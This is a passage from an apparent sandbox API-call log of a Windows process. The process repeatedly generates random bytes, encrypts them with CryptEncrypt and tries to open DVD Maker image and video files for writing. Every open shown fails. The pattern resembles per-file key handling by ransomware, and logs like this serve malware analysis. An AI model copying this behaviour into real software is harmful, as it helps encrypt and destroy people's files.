pbData=0x31f110*, pdwDataLen=0x57fc70*=0x30) returned 1 [0093.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.205] GetProcessHeap () returned 0x2c0000 [0093.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.205] GetProcessHeap () returned 0x2c0000 [0093.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381ca0 | out: hHeap=0x2c0000) returned 1 [0093.205] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc78 | out: pbBuffer=0x57fc78) returned 1 [0093.205] GetProcessHeap () returned 0x2c0000 [0093.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.205] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc70*=0x30) returned 1 [0093.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.206] GetProcessHeap () returned 0x2c0000 [0093.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.206] GetProcessHeap () returned 0x2c0000 [0093.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a660 | out: hHeap=0x2c0000) returned 1 [0093.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc70 | out: pbBuffer=0x57fc70) returned 1 [0093.206] GetProcessHeap () returned 0x2c0000 [0093.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc68*=0x30) returned 1 [0093.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.206] GetProcessHeap () returned 0x2c0000 [0093.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.206] GetProcessHeap () returned 0x2c0000 [0093.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3469c8 | out: hHeap=0x2c0000) returned 1 [0093.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc70 | out: pbBuffer=0x57fc70) returned 1 [0093.206] GetProcessHeap () returned 0x2c0000 [0093.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.207] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc68*=0x30) returned 1 [0093.207] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.207] GetProcessHeap () returned 0x2c0000 [0093.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.207] GetProcessHeap () returned 0x2c0000 [0093.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0093.207] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc68 | out: pbBuffer=0x57fc68) returned 1 [0093.207] GetProcessHeap () returned 0x2c0000 [0093.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.207] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc60*=0x30) returned 1 [0093.207] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.207] GetProcessHeap () returned 0x2c0000 [0093.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.207] GetProcessHeap () returned 0x2c0000 [0093.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0093.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc68 | out: pbBuffer=0x57fc68) returned 1 [0093.208] GetProcessHeap () returned 0x2c0000 [0093.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc60*=0x30) returned 1 [0093.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.208] GetProcessHeap () returned 0x2c0000 [0093.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.208] GetProcessHeap () returned 0x2c0000 [0093.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0093.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc60 | out: pbBuffer=0x57fc60) returned 1 [0093.208] GetProcessHeap () returned 0x2c0000 [0093.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc58*=0x30) returned 1 [0093.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.208] GetProcessHeap () returned 0x2c0000 [0093.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.209] GetProcessHeap () returned 0x2c0000 [0093.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0093.209] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc60 | out: pbBuffer=0x57fc60) returned 1 [0093.209] GetProcessHeap () returned 0x2c0000 [0093.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.209] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc58*=0x30) returned 1 [0093.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.213] GetProcessHeap () returned 0x2c0000 [0093.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.213] GetProcessHeap () returned 0x2c0000 [0093.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0093.213] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc58 | out: pbBuffer=0x57fc58) returned 1 [0093.213] GetProcessHeap () returned 0x2c0000 [0093.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.213] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc50*=0x30) returned 1 [0093.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.214] GetProcessHeap () returned 0x2c0000 [0093.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.214] GetProcessHeap () returned 0x2c0000 [0093.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355888 | out: hHeap=0x2c0000) returned 1 [0093.214] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc58 | out: pbBuffer=0x57fc58) returned 1 [0093.214] GetProcessHeap () returned 0x2c0000 [0093.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.214] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc50*=0x30) returned 1 [0093.214] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.214] GetProcessHeap () returned 0x2c0000 [0093.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.214] GetProcessHeap () returned 0x2c0000 [0093.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34eba8 | out: hHeap=0x2c0000) returned 1 [0093.214] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc50 | out: pbBuffer=0x57fc50) returned 1 [0093.215] GetProcessHeap () returned 0x2c0000 [0093.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.215] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc48*=0x30) returned 1 [0093.215] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.215] GetProcessHeap () returned 0x2c0000 [0093.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.215] GetProcessHeap () returned 0x2c0000 [0093.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3554a8 | out: hHeap=0x2c0000) returned 1 [0093.215] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc50 | out: pbBuffer=0x57fc50) returned 1 [0093.215] GetProcessHeap () returned 0x2c0000 [0093.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.215] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc48*=0x30) returned 1 [0093.215] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.216] GetProcessHeap () returned 0x2c0000 [0093.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.216] GetProcessHeap () returned 0x2c0000 [0093.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0093.216] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc48 | out: pbBuffer=0x57fc48) returned 1 [0093.216] GetProcessHeap () returned 0x2c0000 [0093.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.217] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc40*=0x30) returned 1 [0093.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.217] GetProcessHeap () returned 0x2c0000 [0093.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.217] GetProcessHeap () returned 0x2c0000 [0093.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a560 | out: hHeap=0x2c0000) returned 1 [0093.217] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc48 | out: pbBuffer=0x57fc48) returned 1 [0093.217] GetProcessHeap () returned 0x2c0000 [0093.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.218] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc40*=0x30) returned 1 [0093.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.218] GetProcessHeap () returned 0x2c0000 [0093.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.218] GetProcessHeap () returned 0x2c0000 [0093.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0093.218] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc40 | out: pbBuffer=0x57fc40) returned 1 [0093.218] GetProcessHeap () returned 0x2c0000 [0093.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.218] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc38*=0x30) returned 1 [0093.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.218] GetProcessHeap () returned 0x2c0000 [0093.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.218] GetProcessHeap () returned 0x2c0000 [0093.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a460 | out: hHeap=0x2c0000) returned 1 [0093.219] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc40 | out: pbBuffer=0x57fc40) returned 1 [0093.219] GetProcessHeap () returned 0x2c0000 [0093.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.219] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc38*=0x30) returned 1 [0093.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.220] GetProcessHeap () returned 0x2c0000 [0093.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.220] GetProcessHeap () returned 0x2c0000 [0093.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0093.220] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc38 | out: pbBuffer=0x57fc38) returned 1 [0093.220] GetProcessHeap () returned 0x2c0000 [0093.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.220] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc30*=0x30) returned 1 [0093.220] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.220] GetProcessHeap () returned 0x2c0000 [0093.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.220] GetProcessHeap () returned 0x2c0000 [0093.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e8d8 | out: hHeap=0x2c0000) returned 1 [0093.221] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc38 | out: pbBuffer=0x57fc38) returned 1 [0093.221] GetProcessHeap () returned 0x2c0000 [0093.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.221] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc30*=0x30) returned 1 [0093.221] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.221] GetProcessHeap () returned 0x2c0000 [0093.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.221] GetProcessHeap () returned 0x2c0000 [0093.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377d38 | out: hHeap=0x2c0000) returned 1 [0093.222] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc30 | out: pbBuffer=0x57fc30) returned 1 [0093.222] GetProcessHeap () returned 0x2c0000 [0093.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.222] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc28*=0x30) returned 1 [0093.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.222] GetProcessHeap () returned 0x2c0000 [0093.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.222] GetProcessHeap () returned 0x2c0000 [0093.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0093.222] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc30 | out: pbBuffer=0x57fc30) returned 1 [0093.222] GetProcessHeap () returned 0x2c0000 [0093.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.222] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc28*=0x30) returned 1 [0093.223] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.224] GetProcessHeap () returned 0x2c0000 [0093.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.224] GetProcessHeap () returned 0x2c0000 [0093.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0093.224] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc28 | out: pbBuffer=0x57fc28) returned 1 [0093.224] GetProcessHeap () returned 0x2c0000 [0093.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.224] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc20*=0x30) returned 1 [0093.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.224] GetProcessHeap () returned 0x2c0000 [0093.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.236] GetProcessHeap () returned 0x2c0000 [0093.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0093.236] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc28 | out: pbBuffer=0x57fc28) returned 1 [0093.236] GetProcessHeap () returned 0x2c0000 [0093.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.236] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc20*=0x30) returned 1 [0093.236] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.236] GetProcessHeap () returned 0x2c0000 [0093.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.236] GetProcessHeap () returned 0x2c0000 